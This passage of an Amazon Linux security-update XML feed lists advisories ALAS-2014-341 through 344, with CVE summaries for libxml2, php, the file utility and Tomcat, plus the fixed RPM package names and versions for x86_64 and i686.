</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877" title="" id="CVE-2013-2877" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-devel" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-1.1.27.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.27.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.9.1-1.1.27.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="1.1.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-341</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-341: medium priority package update for libxml2</title><issued date="2014-05-21 10:31:00" /><updated date="2014-09-18 00:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0191:
1090976:
CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191" title="" id="CVE-2014-0191" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-debuginfo" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.9.1-1.1.30.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="1.1.30.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-1.1.30.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="1.1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxml2-static-2.9.1-1.1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-342</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-342: medium priority package update for php55</title><issued date="2014-05-21 10:40:00" /><updated date="2014-09-18 00:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-mbstring" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.12" release="1.71.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-process" 
version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.12-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.12" release="1.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-gmp-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.12" release="1.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-debuginfo-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.12" release="1.71.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.12-1.71.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.12" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.12-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-343</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-343: medium priority package update for php54</title><issued date="2014-05-21 10:40:00" /><updated date="2014-09-18 00:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mbstring" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.28" release="1.54.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" 
version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.28" release="1.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mysqlnd-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.28" release="1.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mbstring-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.28" release="1.54.amzn1" 
epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.28-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-344</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-344: medium priority package update for tomcat6</title><issued date="2014-05-21 10:45:00" /><updated date="2014-09-18 00:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0050:
A denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. A remote attacker could use this flaw to create a malformed Content-Type header for a multipart request, causing JBoss Web to enter an infinite loop when processing such an incoming request.
CVE-2013-4322:
It was discovered that the fix for CVE-2012-3544 did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default.
CVE-2013-4286:
It was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. A remote attacker could use this flaw to poison a web cache, perform cross-site scripting (XSS) attacks, or obtain sensitive information from other requests.
CVE-2012-3544:
It was discovered that the fix for CVE-2012-3544 did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3544" title="" id="CVE-2012-3544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4286" title="" id="CVE-2013-4286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322" title="" id="CVE-2013-4322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050" title="" id="CVE-2014-0050" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0429.html" title="" id="RHSA-2014:0429" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-servlet-2.5-api" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.39" release="1.4.amzn1" epoch="0" 